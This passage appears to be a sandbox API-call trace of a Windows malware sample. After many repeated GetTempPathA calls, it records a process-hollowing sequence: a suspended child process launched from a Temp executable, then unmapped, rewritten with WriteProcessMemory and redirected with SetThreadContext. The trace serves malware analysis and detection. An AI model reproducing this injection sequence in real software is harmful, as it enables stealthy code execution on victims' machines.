nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.887] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.887] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.887] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.887] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 
0x25 [0107.887] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.887] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.887] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.887] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.887] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.887] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.887] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.887] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.887] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.887] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.887] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.887] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.887] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.887] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.887] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.887] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.887] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.887] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.887] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.887] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.887] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: 
lpBuffer=0x0) returned 0x25 [0107.887] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.887] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.887] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.887] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.887] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.887] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.887] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.887] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.887] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.887] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.887] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.887] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.887] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.887] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.888] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.888] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.888] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.888] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.888] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.888] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.888] GetTempPathA (in: nBufferLength=0x0, 
lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.888] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.888] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.888] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.888] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.888] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.888] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.888] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.888] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.888] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.888] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.888] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.888] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.888] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.888] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.888] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.888] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.888] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.888] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.888] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.888] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.888] GetTempPathA (in: 
nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.888] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.888] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.888] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.888] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.888] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.888] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.888] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.888] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.888] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.888] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.888] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.033] VirtualProtect (in: lpAddress=0x233530, dwSize=0x564a0, flNewProtect=0x40, lpflOldProtect=0x12fe48 | out: lpflOldProtect=0x12fe48*=0x4) returned 1 [0108.034] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0108.034] LoadLibraryA (lpLibFileName="user32") returned 0x76b40000 [0108.034] GetProcAddress (hModule=0x76b40000, lpProcName="MessageBoxA") returned 0x76b9ea11 [0108.034] LoadLibraryA (lpLibFileName="kernel32") returned 0x76910000 [0108.034] GetProcAddress (hModule=0x76910000, lpProcName="WinExec") returned 0x7699e5fd [0108.034] GetProcAddress (hModule=0x76910000, lpProcName="CreateFileA") returned 0x7695cee8 [0108.034] GetProcAddress (hModule=0x76910000, lpProcName="WriteFile") returned 0x76961400 [0108.034] GetProcAddress 
(hModule=0x76910000, lpProcName="CloseHandle") returned 0x7695ca7c [0108.034] GetProcAddress (hModule=0x76910000, lpProcName="CreateProcessA") returned 0x76912082 [0108.034] GetProcAddress (hModule=0x76910000, lpProcName="GetThreadContext") returned 0x76970cc1 [0108.034] GetProcAddress (hModule=0x76910000, lpProcName="VirtualAlloc") returned 0x76962fb6 [0108.035] GetProcAddress (hModule=0x76910000, lpProcName="VirtualAllocEx") returned 0x7694c1b6 [0108.035] GetProcAddress (hModule=0x76910000, lpProcName="VirtualFree") returned 0x76961da4 [0108.035] GetProcAddress (hModule=0x76910000, lpProcName="ReadProcessMemory") returned 0x7694c1ce [0108.035] GetProcAddress (hModule=0x76910000, lpProcName="WriteProcessMemory") returned 0x7694c1de [0108.035] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadContext") returned 0x769a0193 [0108.035] GetProcAddress (hModule=0x76910000, lpProcName="ResumeThread") returned 0x76950f1c [0108.035] GetProcAddress (hModule=0x76910000, lpProcName="WaitForSingleObject") returned 0x7695ba90 [0108.035] GetProcAddress (hModule=0x76910000, lpProcName="GetModuleFileNameA") returned 0x769633f6 [0108.035] GetProcAddress (hModule=0x76910000, lpProcName="GetCommandLineA") returned 0x769698ff [0108.035] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77230000 [0108.035] GetProcAddress (hModule=0x77230000, lpProcName="NtUnmapViewOfSection") returned 0x772769b8 [0108.035] GetProcAddress (hModule=0x76b40000, lpProcName="RegisterClassExA") returned 0x76b46293 [0108.035] GetProcAddress (hModule=0x76b40000, lpProcName="CreateWindowExA") returned 0x76b4bf40 [0108.035] GetProcAddress (hModule=0x76b40000, lpProcName="PostMessageA") returned 0x76b4b446 [0108.035] GetProcAddress (hModule=0x76b40000, lpProcName="GetMessageA") returned 0x76b51899 [0108.035] GetProcAddress (hModule=0x76b40000, lpProcName="DefWindowProcA") returned 0x76b4bb1c [0108.035] RegisterClassExA (param_1=0x12fbc0) returned 0xc13d [0108.035] CreateWindowExA (dwExStyle=0x200, 
lpClassName="bxVV7cGHPHusOnmHbFKqGnzKMpomaw", lpWindowName="ptodEzQlWskupc762Nhc3wjD8apfHQ", dwStyle=0xcf0000, X=-2147483648, Y=-2147483648, nWidth=1000, nHeight=1000, hWndParent=0x0, hMenu=0x0, hInstance=0x0, lpParam=0x0) returned 0x6019a [0108.192] PostMessageA (hWnd=0x6019a, Msg=0x400, wParam=0x64, lParam=0x1f4) returned 1 [0108.192] GetMessageA (in: lpMsg=0x12fbf0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x12fbf0) returned 1 [0108.192] VirtualAlloc (lpAddress=0x0, dwSize=0x2800, flAllocationType=0x1000, flProtect=0x4) returned 0x1c0000 [0108.192] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x1c0000, nSize=0x2800 | out: lpFilename="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\Wtsk8WxH.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\wtsk8wxh.exe")) returned 0x30 [0108.192] GetCommandLineA () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\Wtsk8WxH.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"LOCAL_3188F4D96148D062\" \"60000\"" [0108.192] CreateProcessA (in: lpApplicationName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\Wtsk8WxH.exe", lpCommandLine="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\Wtsk8WxH.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"LOCAL_3188F4D96148D062\" \"60000\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x4, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12faf0*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb48 | out: lpCommandLine="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\Wtsk8WxH.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"LOCAL_3188F4D96148D062\" \"60000\"", 
lpProcessInformation=0x12fb48*(hProcess=0x4c, hThread=0x48, dwProcessId=0xcb4, dwThreadId=0xcb8)) returned 1 [0108.194] VirtualFree (lpAddress=0x1c0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0108.194] VirtualAlloc (lpAddress=0x0, dwSize=0x4, flAllocationType=0x1000, flProtect=0x4) returned 0x1c0000 [0108.194] GetThreadContext (in: hThread=0x48, lpContext=0x1c0000 | out: lpContext=0x1c0000*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x3b, SegEs=0x23, SegDs=0x23, Edi=0x0, Esi=0x0, Ebx=0x7ffd5000, Edx=0x0, Ecx=0x0, Eax=0x402581, Ebp=0x0, Eip=0x77277098, SegCs=0x1b, EFlags=0x200, Esp=0x12fff0, SegSs=0x23, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, 
[29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, 
[217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, 
[398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1 [0108.230] ReadProcessMemory (in: hProcess=0x4c, lpBaseAddress=0x7ffd5008, lpBuffer=0x12fb3c, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12fb3c*, lpNumberOfBytesRead=0x0) returned 1 [0108.230] NtUnmapViewOfSection (ProcessHandle=0x4c, BaseAddress=0x400000) returned 0x0 [0108.230] VirtualAllocEx (hProcess=0x4c, lpAddress=0x400000, dwSize=0x11d000, flAllocationType=0x3000, flProtect=0x40) returned 0x400000 [0108.230] WriteProcessMemory (in: hProcess=0x4c, lpBaseAddress=0x400000, lpBuffer=0x2347d0*, nSize=0x1000, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x2347d0*, lpNumberOfBytesWritten=0x0) returned 1 [0108.231] WriteProcessMemory (in: hProcess=0x4c, lpBaseAddress=0x401000, lpBuffer=0x234bd0, nSize=0x0, 
lpNumberOfBytesWritten=0x0 | out: lpNumberOfBytesWritten=0x0) returned 0 [0108.231] WriteProcessMemory (in: hProcess=0x4c, lpBaseAddress=0x4c7000, lpBuffer=0x234bd0*, nSize=0x54600, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x234bd0*, lpNumberOfBytesWritten=0x0) returned 1 [0108.237] WriteProcessMemory (in: hProcess=0x4c, lpBaseAddress=0x51c000, lpBuffer=0x2891d0*, nSize=0x800, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x2891d0*, lpNumberOfBytesWritten=0x0) returned 1 [0108.237] WriteProcessMemory (in: hProcess=0x4c, lpBaseAddress=0x7ffd5008, lpBuffer=0x234904*, nSize=0x4, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x234904*, lpNumberOfBytesWritten=0x0) returned 1 [0108.237] SetThreadContext (hThread=0x48, lpContext=0x1c0000*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x3b, SegEs=0x23, SegDs=0x23, Edi=0x0, Esi=0x0, Ebx=0x7ffd5000, Edx=0x0, Ecx=0x0, Eax=0x51b2d0, Ebp=0x0, Eip=0x77277098, SegCs=0x1b, 
